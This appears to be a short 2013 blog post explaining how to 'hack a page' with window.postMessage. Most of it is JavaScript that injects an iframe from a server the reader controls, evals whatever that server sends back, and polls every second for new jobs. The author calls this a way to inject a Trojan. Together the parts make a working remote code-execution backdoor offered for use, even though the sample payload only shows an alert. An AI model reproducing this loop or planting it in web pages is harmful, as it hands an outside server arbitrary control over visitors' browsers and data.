2013年4月5日星期五

use window.postMessage to hack a page

Just wondering to if I can ingest a Trojan into a page, and my server can control the client to run any javascript. Here I get a solution: https://developer.mozilla.org/en-US/docs/DOM/window.postMessage
 
Type F12 in Chrome and paste the following js code in Console:
 
//inject iframe window
var body = document.getElementsByTagName('body' )[0];
var iframe = document.createElement('iframe' );
iframe.id = "proxy_iframe";
iframe.src = 'http://localhost:24189/';
body.appendChild(iframe);

//register callback
function receiveMessage(event) {
    eval( "("+event.data+ ")();" );
}
window.addEventListener( "message", receiveMessage, false);

//invoke
window.setTimeout( function() {
    iframe.contentWindow.postMessage( "0" , "*" );
}, 1000);
 
Replace localhost:24189 to the server you can control.
 
On server you can response a HTML like this:
 
< html>
    <head >
        < title> Proxy</ title >
        < script>
            //return a function to exec in host
            function loop(args) {
                return function () {
                    function crawl(url) {
                        alert(url);
                    }
                    crawl(( new Date()).toString());
                    window.setTimeout( function () {
                        iframe.contentWindow.postMessage( "0" , "*" );
                    }, 1000);
                };
            }

            window.onload = function() {

                function receiveMessage(event) {
                    event.source.postMessage(loop(event.data).toString(), event.origin);
                }

                window.addEventListener( "message" , receiveMessage, false );
            };
        </ script></ head ><body ></ body>
</ html>
The magic here is you can serialize a function as a string from your server to the host page, and run the script in the host page. Don't forget, in the end of the function, to use window.setTimeout to let the host page find more jobs from your server later XD.

没有评论: